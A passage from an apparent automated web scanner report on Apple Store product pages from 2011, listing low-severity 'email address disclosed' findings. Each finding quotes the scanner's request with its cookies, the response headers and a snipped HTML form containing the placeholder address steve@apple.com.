ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 18:06:07 GMT
Cache-Control: private, max-age=600
Expires: Thu, 03 Feb 2011 18:17:31 GMT
ETag: "93007f36bf07af80cdc19d6c1ba3df86"
Vary: accept-encoding
content-type: text/html; charset=UTF-8; encoding=UTF8
Date: Thu, 03 Feb 2011 18:07:31 GMT
x-request-id: 4c314aca-b9e2-40f9-972f-f94a67ff5dbe
Content-Length: 103111
x-frame-options: sameorigin


<!DOCTYPE html>
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />

<title>Apple In-Ear Headphones with Remote and Mic - Apple Store (U.S.)</title
...[SNIP]...
<input name="mid" value="" type="email" maxlength="128" placeholder="example: steve@apple.com" />
...[SNIP]...

23.55. http://store.apple.com/us/product/MA850G/B  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us/product/MA850G/B

Issue detail

The following email address was disclosed in the response:

Request

GET /us/product/MA850G/B HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D1%2C; geo=US; s_sq=appleglobal%2Capplestoreww%2Capplestoreus%2Capplestoreusconsum%3D%2526pid%253DAOS%25253A%252520home/shop_ipod/family/ipod_classic/engrave%2526pidt%253D1%2526oid%253DMTA4NTI1NTY%2526oidt%253D1%2526ot%253DIMAGE%2526oi%253D1%26appleusmac%3D%2526pid%253Dmac%252520-%252520index%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.apple.com%25252Fipod%25252F_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20index%20(US);

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 16:54:59 GMT
Cache-Control: private, max-age=600
Expires: Thu, 03 Feb 2011 18:02:59 GMT
ETag: "a2b326deb623848ad5f06a4617712c28"
Vary: accept-encoding
content-type: text/html; charset=UTF-8; encoding=UTF8
Date: Thu, 03 Feb 2011 17:52:59 GMT
x-request-id: 59d88b14-f29f-4350-8a9b-74b47c938c84
Content-Length: 103110
x-frame-options: sameorigin


<!DOCTYPE html>
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />

<title>Apple In-Ear Headphones with Remote and Mic - Apple Store (U.S.)</title
...[SNIP]...
<input name="mid" value="" type="email" maxlength="128" placeholder="example: steve@apple.com" />
...[SNIP]...

23.56. http://store.apple.com/us/product/MB770G/B  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us/product/MB770G/B

Issue detail

The following email address was disclosed in the response:

Request

GET /us/product/MB770G/B HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 18:00:43 GMT
Cache-Control: private, max-age=600
Expires: Thu, 03 Feb 2011 18:18:52 GMT
ETag: "379cedbc83a132b3d756a52d642b0648"
Vary: accept-encoding
content-type: text/html; charset=UTF-8; encoding=UTF8
Date: Thu, 03 Feb 2011 18:08:52 GMT
x-request-id: 02544892-5b28-4abb-9843-e6d937f0674a
Content-Length: 91540
x-frame-options: sameorigin


<!DOCTYPE html>
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />

<title>Apple Earphones with Remote and Mic - Apple Store (U.S.)</title>

<meta
...[SNIP]...
<input name="mid" value="" type="email" maxlength="128" placeholder="example: steve@apple.com" />
...[SNIP]...

23.57. http://store.apple.com/us/product/MB829  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us/product/MB829

Issue detail

The following email address was disclosed in the response:

Request

GET /us/product/MB829 HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 18:06:03 GMT
Cache-Control: private, max-age=600
Expires: Thu, 03 Feb 2011 18:17:24 GMT
content-type: text/html; charset=UTF-8; encoding=UTF8
Vary: accept-encoding
Date: Thu, 03 Feb 2011 18:07:24 GMT
x-request-id: e97c1625-d2f2-4a73-a943-47a8fd7ac77a
Content-Length: 97285
ETag: "d98057b4bc28944b93b0fba0b4ec9f78"
x-frame-options: sameorigin


<!DOCTYPE html>
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />

<title>Apple Magic Mouse - Apple Store (U.S.)</title>

<meta http-equiv="X-UA-
...[SNIP]...
<input name="mid" value="" type="email" maxlength="128" placeholder="example: steve@apple.com" />
...[SNIP]...

23.58. http://store.apple.com/us/product/MB829LL/A  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us/product/MB829LL/A

Issue detail

The following email address was disclosed in the response:

Request

GET /us/product/MB829LL/A HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 17:55:39 GMT
Cache-Control: private, max-age=600
Expires: Thu, 03 Feb 2011 18:18:09 GMT
ETag: "361a8fab413a829c96b631a2bfdedf1c"
Vary: accept-encoding
content-type: text/html; charset=UTF-8; encoding=UTF8
Date: Thu, 03 Feb 2011 18:08:09 GMT
x-request-id: 618e30ec-0121-465f-b4ad-efec4e3e8057
Content-Length: 97285
x-frame-options: sameorigin


<!DOCTYPE html>
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />

<title>Apple Magic Mouse - Apple Store (U.S.)</title>

<meta http-equiv="X-UA-
...[SNIP]...
<input name="mid" value="" type="email" maxlength="128" placeholder="example: steve@apple.com" />
...[SNIP]...

23.59. http://store.apple.com/us/product/MC007  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us/product/MC007

Issue detail

The following email address was disclosed in the response:

Request

GET /us/product/MC007 HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome; s_pathLength=homepage%3D1%2C; geo=US; s_sq=%5B%5BB%5D%5D; s_ppv=100%2C100%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; s_invisit_us=homepage%3Dtrue%3B; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=apple%20-%20index%20(US);

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 17:48:34 GMT
Cache-Control: private, max-age=600
Expires: Thu, 03 Feb 2011 17:59:10 GMT
content-type: text/html; charset=UTF-8; encoding=UTF8
ETag: "afe1752135dbb93f31a1d3611f923ee5"
Vary: accept-encoding
Date: Thu, 03 Feb 2011 17:49:10 GMT
x-request-id: cc358995-fd0a-41a9-bb92-cada08103be0
Content-Length: 98254
x-frame-options: sameorigin


<!DOCTYPE html>
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />

<title>Apple LED Cinema Display (27&quot; flat panel) - Apple Store (U.S.)</ti
...[SNIP]...
<input name="mid" value="" type="email" maxlength="128" placeholder="example: steve@apple.com" />
...[SNIP]...

23.60. http://store.apple.com/us/product/MC380  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us/product/MC380

Issue detail

The following email address was disclosed in the response:

Request

GET /us/product/MC380 HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 18:06:00 GMT
Cache-Control: private, max-age=600
Expires: Thu, 03 Feb 2011 18:17:22 GMT
ETag: "9c573cc14706832e6227d37a70e10606"
Vary: accept-encoding
content-type: text/html; charset=UTF-8; encoding=UTF8
Date: Thu, 03 Feb 2011 18:07:22 GMT
x-request-id: ab22da87-6693-4429-8298-ff4314ec1db7
Content-Length: 85066
x-frame-options: sameorigin


<!DOCTYPE html>
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />

<title>Magic Trackpad - Apple Store (U.S.)</title>

<meta http-equiv="X-UA-Com
...[SNIP]...
<input name="mid" value="" type="email" maxlength="128" placeholder="example: steve@apple.com" />
...[SNIP]...

23.61. http://store.apple.com/us/product/MC500  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us/product/MC500

Issue detail

The following email address was disclosed in the response:

Request

GET /us/product/MC500 HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 17:48:38 GMT
Cache-Control: private, max-age=600
Expires: Thu, 03 Feb 2011 18:17:23 GMT
content-type: text/html; charset=UTF-8; encoding=UTF8
Vary: accept-encoding
Date: Thu, 03 Feb 2011 18:07:23 GMT
x-request-id: d7b42b34-36fe-40ae-b0fc-7862cb77c41a
Content-Length: 93141
ETag: "523772108b9774da3c50d0e93c80fbdd"
x-frame-options: sameorigin


<!DOCTYPE html>
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />

<title>Apple Battery Charger - Apple Store (U.S.)</title>

<meta http-equiv="X
...[SNIP]...
<input name="mid" value="" type="email" maxlength="128" placeholder="example: steve@apple.com" />
...[SNIP]...

23.62. http://store.apple.com/us/product/MC650  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us/product/MC650

Issue detail

The following email address was disclosed in the response:

Request

GET /us/product/MC650 HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
